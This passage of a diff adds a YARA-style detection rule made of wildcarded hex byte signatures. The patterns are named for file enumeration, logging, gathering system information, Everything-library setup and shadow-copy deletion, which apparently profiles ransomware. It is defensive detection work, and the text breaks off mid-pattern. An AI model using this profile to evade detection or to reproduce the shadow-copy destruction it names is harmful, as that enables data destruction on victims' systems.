+            ?? ?? 8B C2 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 47 ?? ?? ?? ?? ?? 6A ?? C7 47 ??
+            ?? ?? ?? ?? 57 66 89 07 E8 ?? ?? ?? ?? 83 C4 ?? 8B 13 4E 6A ?? 52 89 75 ?? 8B 4A ??
+            8B 02 89 01 8B 0A 8B 42 ?? 89 41 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B BD ??
+            ?? ?? ?? 8B 35 ?? ?? ?? ?? 0F 1F 00 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0
+            0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? A9 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 0F 85 ?? ??
+            ?? ?? A8 ?? 0F 84 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? 8B D4 89 A5 ?? ?? ?? ?? 33
+            C0 8D 71 ?? C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? 66 89 02 0F 1F 80 ?? ?? ?? ??
+            66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CE 8D 85 ?? ?? ?? ?? D1 F9 51 50 8B CA E8 ?? ??
+            ?? ?? 83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 80 BF ?? ?? ?? ?? ?? 75 ?? 8B 3D ?? ?? ?? ?? 8D 5D
+            ?? 83 7D ?? ?? 0F 43 5D ?? 8B 37 3B F7 74 ?? 83 7E ?? ?? 8D 46 ?? 72 ?? 8B 00 50 53
+            FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 36 3B F7 75 ?? 8B 9D ?? ?? ?? ?? 6A ??
+            E8 ?? ?? ?? ?? 8B C8 83 C4 ?? 33 C0 89 8D ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ??
+            ?? ?? ?? ?? 66 89 01 8D 45 ?? 3B C8 74 ?? 83 7D ?? ?? FF 75 ?? 0F 43 45 ?? 50 E8 ??
+            ?? ?? ?? 8B 73 ?? 8D 85 ?? ?? ?? ?? 50 56 53 E8 ?? ?? ?? ?? 8B 55 ?? B9
+        }
+		$find_files_p3 = {
+            2B CA 83 F9 ?? 0F 82 ?? ?? ?? ?? 89 43 ?? 42 8B 5D ?? 89 55 ?? 89 06 89 9D ?? ?? ??
+            ?? E9 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? 80 BF ?? ?? ?? ?? ?? 75 ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? 8B D4
+            89 A5 ?? ?? ?? ?? 33 C0 8D 71 ?? C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? 66 89 02
+            66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CE 8D 85 ?? ?? ?? ?? D1 F9 51 50 8B CA E8 ?? ??
+            ?? ?? 83 EC ?? C6 45 ?? ?? 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 80 BF ?? ?? ?? ?? ?? 75 ?? 83 EC ?? 8D 45 ?? 8B CC
+            50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ?? 83 EC ?? 8D 45 ?? 8B CC 50 E8
+            ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B D7 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 3D ?? ?? ?? ?? 7C
+            ?? 85 F6 75 ?? A1 ?? ?? ?? ?? EB ?? 83 FE ?? 75 ?? A1 ?? ?? ?? ?? EB ?? 83 FE ?? 75
+            ?? A1 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? FF 87 ?? ?? ?? ?? C6 45 ?? ?? 8B 55 ??
+            83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ??
+            83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B
+            35 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B BD ?? ??
+            ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 85 F6 74 ?? 8B 4E ?? 83 F9 ?? 72 ??
+            8B 06 8D 0C 4D ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ??
+            83 F8 ?? 0F 87 ?? ?? ?? ?? 8B C2 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 46 ?? ?? ??
+            ?? ?? 6A ?? C7 46 ?? ?? ?? ?? ?? 56 66 89 06 E8 ?? ?? ?? ?? 83 C4 ?? 8B 13 8B 75 ??
+            6A ?? 4E 8B 4A ?? 8B 02 52 89 75 ?? 89 01 8B 0A 8B 42 ?? 89 41 ?? E8 ?? ?? ?? ?? 83
+        }
+		$find_files_p4 = {
+            C4 ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? C6 45 ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D
+            ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0
+            ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 33 C0 8B 55
+            ?? 66 89 45 ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ??
+            ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87
+            ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 F6 0F 85 ?? ?? ?? ?? 8B 03 89 1B 89 5B
+            ?? 3B C3 74 ?? 8B 30 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 3B F3 75 ?? 6A ?? 53 E8
+            ?? ?? ?? ?? 8B 55 ?? 83 C4 ?? 83 FA ?? 0F 82 ?? ?? ?? ?? 8B 4D ?? 8D 14 55 ?? ?? ??
+            ?? 8B C1 81 FA ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8
+            ?? 0F 87 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ??
+            ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87
+            ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? 66 89 45 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA
+            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ??
+            8B 03 89 1B 89 5B ?? 3B C3 0F 84 ?? ?? ?? ?? 8B 30 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            8B C6 3B F3 75 ?? E9 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ??
+            ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$write_console_log_p1 = {
+            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
+            ?? ?? 53 56 57 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? B8 ?? ?? ?? ?? F0 0F B1 0A 85 C0 0F 84
+            ?? ?? ?? ?? 8B 45 ?? 8D 7C 24 ?? 85 C0 B9 ?? ?? ?? ?? 0F 45 C8 8D 45 ?? 50 33 F6 8B
+            C7 56 51 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 08 FF 70 ?? 83 C9 ?? 51 E8 ?? ?? ?? ??
+            83 C9 ?? 83 C4 ?? 85 C0 0F 48 C1 85 C0 78 ?? 3D ?? ?? ?? ?? 77 ?? 75 ?? EB ?? BE ??
+            ?? ?? ?? 33 C0 66 89 84 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D 44 44 ?? 89 44 24 ?? 85 F6
+            79 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? BA ?? ?? ?? ?? 50 8D 44 24 ?? 50 51 8D 8C 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 81 FE ?? ?? ?? ?? 75 ?? 8B 44 24 ?? 8B F8 8D 44 24 ?? 2B F8 83
+            E7 ?? 85 FF 0F 8E ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 0F B7 44 24 ?? 50 0F
+            B7 44 24 ?? 50 0F B7 44 24 ?? 50 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83
+            C4 ?? 8B F0 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ??
+            ?? 8B 0D ?? ?? ?? ?? F6 C1 ?? 74 ?? 8B 15 ?? ?? ?? ?? 83 FA ?? 74 ?? 6A ?? 8D 44 24
+            ?? 50 8D 04 36 8B 35 ?? ?? ?? ?? 50 8D 44 24 ?? 50 52 FF D6 6A ?? 8D 44 24 ?? 50 57
+            8D 44 24 ?? 50 FF 35 ?? ?? ?? ?? FF D6 6A ?? 8D 44 24 ?? 50 6A ?? 68 ?? ?? ?? ?? FF
+        }
+		$write_console_log_p2 = {
+            35 ?? ?? ?? ?? FF D6 8B 0D ?? ?? ?? ?? F6 C1 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
+            84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 FF D3 6A ?? 6A ?? 6A ?? 6A ?? 8B D8 8D 84
+            24 ?? ?? ?? ?? 53 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 74 ?? 8D 0C 7D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 57 8B F0 8D 84 24 ?? ?? ?? ?? 56 53 50 6A ?? 6A ??
+            FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B D6 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8
+            ?? ?? ?? ?? 83 C4 ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 3D ?? ??
+            ?? ?? ?? 74 ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF D3 8D 04 45 ?? ?? ?? ?? 89
+            44 24 ?? 8D 44 24 ?? 89 44 24 ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50
+            6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 CC
+            E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$get_system_information_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 51 B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 65 ?? 68 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? BB ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 0F 44 C3 6A ?? A2 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 8B 35 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 74 ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6
+            B9 ?? ?? ?? ?? 83 C4 ?? 8D 51 ?? 90 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51
+            68 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B CA
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 85 ?? ?? ?? ?? 8D 79 ?? 66 8B 01
+            83 C1 ?? 66 85 C0 75 ?? 2B CF D1 F9 51 52 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 1F 84 00
+        }
+		$get_system_information_p2 = {
+            C6 00 ?? 8D 40 ?? 83 E9 ?? 75 ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50
+            FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ??
+            FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D6 83 C4 ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 0F 57 C0 8B 85 ?? ?? ?? ?? 8B
+            8D ?? ?? ?? ?? 0F AC C6 ?? 8B 85 ?? ?? ?? ?? 0F AC C1 ?? 6A ?? 66 0F 13 85 ?? ?? ??
+            ?? 6A ?? 89 B5 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 89 BD
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ??
+            50 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 0F B6 05 ?? ?? ?? ?? 83 BD
+            ?? ?? ?? ?? ?? 0F 45 C3 A2 ?? ?? ?? ?? 33 F6 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 8D 4E ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F
+            84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4E ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? FF D3 68 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B F0 33
+            C0 85 F6 0F 44 C8 8D 85 ?? ?? ?? ?? 50 51 56 6A ?? FF B5 ?? ?? ?? ?? 89 8D ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 0F 1F 44 00 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 85
+            F6 74 ?? 56 6A ?? FF D3 50 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? FF D3 56 6A ?? 50 FF
+            15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? 56 6A ?? FF
+            B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89
+        }
+		$get_system_information_p3 = {
+            B5 ?? ?? ?? ?? 33 DB 3B 1E 0F 83 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 74 DE ?? FF 15 ??
+            ?? ?? ?? 85 C0 74 ?? C6 05 ?? ?? ?? ?? ?? EB ?? FF B5 ?? ?? ?? ?? FF 74 DE ?? FF 15
+            ?? ?? ?? ?? 85 C0 74 ?? F6 44 DE ?? ?? B9 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 0F 45 C1
+            A2 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66
+            89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ??
+            ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 8B 54 DE ?? 8B 4C DE ?? 50 E8 ?? ?? ?? ?? 8B 47 ??
+            8D 8D ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 51 50 57 E8 ?? ?? ?? ?? 8B 95 ?? ?? ??
+            ?? B9 ?? ?? ?? ?? 2B CA 83 F9 ?? 0F 82 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 42 89 47 ?? 89
+            95 ?? ?? ?? ?? 89 01 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 43 E9 ?? ??
+            ?? ?? 8B 8D ?? ?? ?? ?? 8B 01 FF 50 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ??
+            ?? 8D 8D ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 03
+            C1 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 51 50 51 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? 50 0F 43 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 C4 ??
+            8B 8D ?? ?? ?? ?? 83 F9 ?? 72 ?? 8B 85 ?? ?? ?? ?? 8D 0C 4D ?? ?? ?? ?? 81 F9 ?? ??
+            ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 8B C2 51 50
+        }
+		$get_system_information_p4 = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C6 45 ?? ?? 8B 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 83 F9 ?? 72 ?? 8B 85 ?? ??
+            ?? ?? 41 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ??
+            ?? ?? ?? 8B C2 51 50 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? C3 8B 85 ?? ?? ?? ?? BB
+            ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? 8B BD ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 85
+            F6 74 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 35 ??
+            ?? ?? ?? 85 C0 74 ?? 50 FF D6 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 50 FF D6 FF B5 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? 8B CA C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 85 ??
+            ?? ?? ?? 8D 41 ?? 89 85 ?? ?? ?? ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B 8D ?? ?? ??
+            ?? D1 F9 51 52 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 83 BD
+            ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 0F B6 0D ??
+            ?? ?? ?? 85 C0 8B 85 ?? ?? ?? ?? 0F 45 CB A3 ?? ?? ?? ?? 66 83 BD ?? ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 0F 95 05 ?? ?? ?? ?? 88 0D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 0F 94 05 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15
+        }
+		$everything_library_setup_p1 = {
+            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
+            ?? 64 A1 ?? ?? ?? ?? 50 53 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 50 8D 45 ??
+            64 A3 ?? ?? ?? ?? 88 55 ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 80 7D ?? ?? 74 ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 6A ??
+            6A ?? B2 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF D6 33 D2 C6 45
+            ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ??
+            ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 8B
+            35 ?? ?? ?? ?? 0F 43 45 ?? 50 FF D6 85 C0 74 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? B0 ??
+            E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B D0 C7 45 ?? ?? ?? ?? ??
+            8B CA C7 45 ?? ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 45 ?? 8D 79 ?? 66 8B 01 83 C1 ?? 66
+            85 C0 75 ?? 2B CF D1 F9 51 52 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ??
+            C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 0F 10 4D ?? 8D 4D ?? F3
+        }
+		$everything_library_setup_p2 = {
+            0F 7E 45 ?? C6 45 ?? ?? 83 7D ?? ?? FF 75 ?? 66 0F 7E C8 0F 11 4D ?? 0F 43 C8 66 0F
+            D6 45 ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83
+            7D ?? ?? 8D 45 ?? 0F 43 45 ?? 50 FF D6 85 C0 74 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? B0
+            ?? EB ?? 8A 45 ?? C6 05 ?? ?? ?? ?? ?? 84 C0 74 ?? 83 7D ?? ?? 8D 4D ?? 0F 43 4D ??
+            32 D2 E8 ?? ?? ?? ?? 8A C8 88 4D ?? 84 C9 75 ?? B2 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8A C8 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 33 D2 84 C9 88 4D ?? 0F 44
+            C2 A2 ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA
+            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ??
+            ?? 83 C4 ?? 8B 55 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 83
+            FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83
+            C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8A 45 ?? 8B 4D ??
+            64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D 8B E3 5B C3
+        }
+		$delete_shadow_copies_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
+            45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F
+            88 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ??
+            ?? 85 C0 0F 88 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 6A ?? 6A ??
+            68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF D6 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 68 ?? ??
+            ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF D6 85 C0 0F 88 ?? ?? ?? ?? 8D 45 ?? 50 FF 15 ??
